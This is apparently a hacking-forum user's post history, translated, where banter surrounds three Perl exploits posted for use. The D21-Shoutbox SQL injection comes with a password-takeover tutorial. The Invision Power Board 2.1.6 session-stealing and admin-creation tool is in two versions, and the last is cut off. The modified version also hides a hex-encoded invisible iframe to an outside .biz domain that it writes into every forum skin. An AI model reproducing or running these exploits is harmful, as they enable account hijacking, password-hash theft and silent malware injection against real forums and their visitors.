Screech
Active Members, 503 posts, last visited: never

Everything posted by Screech

  1. Quote (RaXoR): "I don't have a girlfriend, I don't use one :D" That's hilarious )
     What's so hilarious, man? Well, I'm a busy man, I have businesses worth millions of dollars. I don't let women eat up my money :@ :@ :@ :@ so what do you do with your girlfriend, man?
  2. muaaaa, thanks Kw3[R]Ln, u are my man
  3. Quote (Sad_Dreamer): get up
  4. Big, 5 fingers, some weird shapes, no hair, pretty nice nails... I'm talking about the right one, man ), just kidding, I don't have a girlfriend, I don't use one. Who has time for that kind of thing?
  5. Quote (Kw3[R): I'm a virgin, who's going to f_ck me? that's kwerln's status
  6. Welcome, micutzu, we're waiting to see what you know
  7. http://www.rosecurityteam.net/home/viewtop...&highlight=hexa
  8. Quote (bossjuan): well, what are you doing, ghici, making us guess?
  9. Welcome, NakshatraS, judging by your avatar/signature you give me the impression of a born hacker, I hope I'm not wrong
  10. and where's the video tutorial?
  11. Calm down, guys, you're forum "colleagues" after all, is there any point in arguing? Regardless of whether Sad_Dreamer did something, it shouldn't be taken like this; if you had solid proof it was him, I'd say tell him something, but like this...
  12. Quote (ghici): "I don't agree with you. LAMERS WANT FAME AND GLORY! hackers want.... read the first page about hackers"
     I was referring more to my own way of thinking...
  13. Nice, PsYKid, although the background doesn't really fit (my opinion), but I'd say it's the other way around: hackers want fame and glory, not money
  14. Exploit:

```perl
#!/usr/bin/perl
################################################
#
# D21-Shoutbox v1.1 Exploit Admin Password Change
#
# Author: Synsta
#
# Usuage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431
#
# Orginal Exploit Found by Windak & langtuhaohoa
#
################################################

use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;

# variables
my $login_page   = '?act=Login&CODE=01';
my $id           = '';
my $table_fix    = '';
my $post_pm_page = '';   # the injection string below already begins with '?'
my $tries        = 5;
my $sql          = '';
my $i;
my $j;

# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new(file => "N/A", autosave => 0);
my $resp;

# init the cookie jar
$ua->cookie_jar($cj);

# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";

# get user input
print 'Shoutbox URL (ex: forumurl.com/forum): ';
chomp (my $base_url = <STDIN>);
print 'Your Username: ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your Password: ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;   # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;    # to turn it back on
print "\n" if $stty;
print 'ID:';                    # it'll say next to one of their posts
chomp ($id = <STDIN>);
print 'Table prefix (ex: ibf_): ';
chomp ($table_fix = <STDIN>);

if ($base_url !~ m#^http://#)       { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index.php$#)  { $base_url .= '/' }

# log in as a normal member; the shoutbox query only needs an authenticated session
do {
    $resp = $ua->post($base_url . $login_page, [
        UserName   => $user,
        PassWord   => $pass,
        CookieDate => 1,
    ]);
} while ($tries-- && !$resp->is_success());

# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.\n"; }

$| = 1;
print "\nAttempting to extract validation key from the database...\n ";
# the shoutbox 'id' parameter is not cast to an integer, so a UNION reads the
# pending lost-password key (vid) for the given member out of the validating table
$sql = "?act=Shoutbox&view=mycp?=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";
$resp = $ua->get($base_url . $post_pm_page . $sql);
if (!$resp->is_success()) {
    print "ERROR";
} else {
    #print $resp->content;
    $rs = $resp->content;
    if ($rs =~ /uid=([a-z,0-9]{32})/) {
        print "\nValidation Key: ";
        print $1;
        print "\n\nAuthor: Synsta\n";
        print "Website: w4ck1ng.com\n";
        print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431\n";
    } else {
        print "Can't get the pass from output, try to find it manually : ";
        print $resp->content;
    }
}
<STDIN>;
```

Tut:
1. Go to the forum where the shoutbox is installed, then click the "I've forgotten my password! Click here!" form, enter the nick of the person whose password you want to change plus the code, and press Proceed
2. Run the exploit
3. You will now receive the Validation Key; go to the validation form (usually site/forum/index.php?act=Reg&CODE=lostpassform), enter the victim's id and the key... and you have changed the password
  15. Good:

```perl
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Modified Validating Exploit By 3l3ctr1c
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## ©oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = MainWindow->new(-title => "IPB 2.1.6 Validating By 3l3ctr1c. True Credits : RST/GHC");
$mw->geometry('420x550');
$mw->resizable(0, 0);
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 Validating Exploit. ORIGINAL By RST/GHC : ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$mw->Label(-text => '')->pack();
$fleft  = $mw->Frame()->pack(-side => 'left', -anchor => 'ne');
$fright = $mw->Frame()->pack(-side => 'left', -anchor => 'nw');

# defaults; on vulnerable versions the CLIENT_IP header value reaches an SQL query unescaped
$url                = 'http://server/forum/index.php';
$user_id            = '1';
$prefix             = 'ibf_';
$table              = 'members';
$column             = 'member_login_key';
$new_admin_name     = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email    = 'billy@Mcft.com';
$report             = '';
$group              = 4;
$curr_user          = 0;
$rand_session       = &session();
$use_custom_fields  = 0;
$custom_fields      = 'name1=value1,name2=value2';

# left column: labels; right column: entries bound to the variables above
$fleft->Label(-text => 'Path to forum index: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'User ID: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Database tables prefix: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix)->pack(-side => "top", -anchor => 'w');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => 'get data from database', -font => '{Verdana} 8 bold', -foreground => 'green')->pack(-side => "top", -anchor => 'e');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => 'Get data from table: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$b2 = $fright->BrowseEntry(-command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "validating");
$b2->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Get data from column: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$b = $fright->BrowseEntry(-relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Returned data: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'create new admin', -font => '{Verdana} 8 bold', -foreground => 'green')->pack(-side => "top", -anchor => 'e');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fright->Checkbutton(-font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'session_id: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'session_ip_address: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new admin name: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new admin password: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new_admin_email: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => ' ')->pack();
$fright->Checkbutton(-font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'custom fields: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields)->pack(-side => "top", -anchor => 'w');
$fright->Label(-text => ' ')->pack();
$fright->Button(-text => 'Test forum vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&test_vuln)->pack();
$fright->Button(-text => 'Get database tables prefix', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_prefix)->pack();
$fright->Button(-text => 'Get data from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_data)->pack();
$fright->Button(-text => 'Get admin session', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_admin)->pack();
$fright->Button(-text => 'Create new admin', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&create_admin)->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => 'Validating Hash MOd by 3l3ctr1c', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'www.h4cky0u.org', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'Original C0ding By : 1dt.w0lf ', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();

MainLoop();

# refill the column list when the table selection changes
sub update_columns() {
    $b->delete(0, "end");
    if ($table eq 'members') {
        $column = "member_login_key";
        $b->insert("end", "member_login_key");
        $b->insert("end", "name");
        $b->insert("end", "ip_address");
        $b->insert("end", "legacy_password");
        $b->insert("end", "email");
    } elsif ($table eq 'validating') {
        $column = "vid";
        $b->insert("end", "vid");
        $b->insert("end", "vid");
        $b->insert("end", "vid");
    }
}

# the injected column is echoed back in the page's "ipb_var_s" JavaScript variable
sub get_admin() {
    $xpl = LWP::UserAgent->new() or die;
    $InfoWindow = $mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
    if ($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } else { $sql = ''; }
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
    $error = 0;
    $rep = '';
    if ($res->is_success) {
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        if ($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; } else { $error = 1; }
        if (!$error) {
            $rep = '';
            $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
            if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; } else { $error = 1; }
            if (!$error) {
                if ($curr_user != 1) {
                    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
                    if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
                } else {
                    $session_user_id = $user_id;
                }
                $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
                $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
            }
            $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold', -foreground => 'Green')->pack;
            $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
    if ($error) {
        $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}

sub get_data() {
    $xpl = LWP::UserAgent->new() or die;
    $InfoWindow = $mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
    if ($table eq 'members')    { $id_text = 'id'; }
    if ($table eq 'validating') { $id_text = 'member_id'; }
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) {
            $report = $3;
        } else {
            $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}

sub create_admin() {
    $InfoWindow = $mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
    if ($session_id eq '' || $session_ip_address eq '') {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
    } elsif ($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
    } else {
        $xpl = LWP::UserAgent->new() or die;
        ($url2 = $url) =~ s/index\.php/admin\.php/;
        $cf = '';
        %fields = (
            'code'     => 'doadd',
            'act'      => 'mem',
            'section'  => 'content',
            'name'     => $new_admin_name,
            'password' => $new_admin_password,
            'email'    => $new_admin_email,
            'mgroup'   => $group,
        );
        if ($use_custom_fields) {
            @cf = split(',', $custom_fields);
            foreach (@cf) { ($k, $v) = split('=', $_); $fields{$k} = $v; }
        }
        # the stolen admin session is bound to the admin's IP, which the IP headers spoof
        $res = $xpl->post($url2."?adsess=$session_id", [ %fields ], 'USER_AGENT' => '', 'CLIENT_IP' => "$session_ip_address", 'X_FORWARDED_FOR' => "$session_ip_address");
        # NOTE: nothing in the post explains this hex literal. It decodes to a hidden 1x1
        # <iframe> pointing at a third-party .biz domain, and the request below appends it
        # to every skin wrapper: the "exploit" silently plants that iframe on the whole forum.
        $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
        $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
        $res = $xpl->post($url2."?adsess=$session_id", [ 'code' => 'runsql', 'act' => 'sql', 'section' => 'admin', 'query' => $query ], 'USER_AGENT' => '', 'CLIENT_IP' => "$session_ip_address", 'X_FORWARDED_FOR' => "$session_ip_address");
        $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold', -foreground => 'green')->pack;
        $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub test_vuln() {
    $InfoWindow = $mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new() or die;
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT 'VULN',1,1,1/*");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        if ($rep eq 'VULN') {
            $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        } else {
            $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold', -foreground => 'green')->pack;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub get_prefix() {
    $InfoWindow = $mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new() or die;
    # a lone quote breaks the query and the SQL error message leaks the table prefix
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "'");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /FROM (.*)sessions/) {
            $prefix = $1;
            $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
        } else {
            $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub session() { return 'r57ipb216_for_IDS'; }

# milw0rm.com [2006-07-14]
```
  16. Exploit:

```perl
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## ©oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = MainWindow->new(-title => "r57ipb216gui");
$mw->geometry('420x550');
$mw->resizable(0, 0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$mw->Label(-text => '')->pack();
$fleft  = $mw->Frame()->pack(-side => 'left', -anchor => 'ne');
$fright = $mw->Frame()->pack(-side => 'left', -anchor => 'nw');

# defaults; on vulnerable versions the CLIENT_IP header value reaches an SQL query unescaped
$url                = 'http://server/forum/index.php';
$user_id            = '1';
$prefix             = 'ibf_';
$table              = 'members';
$column             = 'member_login_key';
$new_admin_name     = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email    = 'billy@microsoft.com';
$report             = '';
$group              = 4;
$curr_user          = 0;
$rand_session       = &session();
$use_custom_fields  = 0;
$custom_fields      = 'name1=value1,name2=value2';

# left column: labels; right column: entries bound to the variables above
$fleft->Label(-text => 'Path to forum index: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'User ID: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Database tables prefix: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix)->pack(-side => "top", -anchor => 'w');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => 'get data from database', -font => '{Verdana} 8 bold', -foreground => 'green')->pack(-side => "top", -anchor => 'e');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => 'Get data from table: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$b2 = $fright->BrowseEntry(-command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Get data from column: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$b = $fright->BrowseEntry(-relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'Returned data: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'create new admin', -font => '{Verdana} 8 bold', -foreground => 'green')->pack(-side => "top", -anchor => 'e');
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fright->Checkbutton(-font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'session_id: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'session_ip_address: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new admin name: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new admin password: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'new_admin_email: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => ' ')->pack();
$fright->Checkbutton(-font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top", -anchor => 'w');
$fleft->Label(-text => 'custom fields: ', -font => '{Verdana} 8 bold')->pack(-side => "top", -anchor => 'e');
$fright->Entry(-relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields)->pack(-side => "top", -anchor => 'w');
$fright->Label(-text => ' ')->pack();
$fright->Button(-text => 'Test forum vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&test_vuln)->pack();
$fright->Button(-text => 'Get database tables prefix', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_prefix)->pack();
$fright->Button(-text => 'Get data from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_data)->pack();
$fright->Button(-text => 'Get admin session', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&get_admin)->pack();
$fright->Button(-text => 'Create new admin', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => \&create_admin)->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();
$fleft->Label(-text => '©oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'RST/GHC', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
$fleft->Label(-text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();

MainLoop();

# refill the column list when the table selection changes
sub update_columns() {
    $b->delete(0, "end");
    if ($table eq 'members') {
        $column = "member_login_key";
        $b->insert("end", "member_login_key");
        $b->insert("end", "name");
        $b->insert("end", "ip_address");
        $b->insert("end", "legacy_password");
        $b->insert("end", "email");
    } elsif ($table eq 'members_converge') {
        $column = "converge_pass_hash";
        $b->insert("end", "converge_pass_hash");
        $b->insert("end", "converge_pass_salt");
        $b->insert("end", "converge_email");
    }
}

# the injected column is echoed back in the page's "ipb_var_s" JavaScript variable
sub get_admin() {
    $xpl = LWP::UserAgent->new() or die;
    $InfoWindow = $mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
    if ($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } else { $sql = ''; }
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
    $error = 0;
    $rep = '';
    if ($res->is_success) {
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        if ($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; } else { $error = 1; }
        if (!$error) {
            $rep = '';
            $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
            if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; } else { $error = 1; }
            if (!$error) {
                if ($curr_user != 1) {
                    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
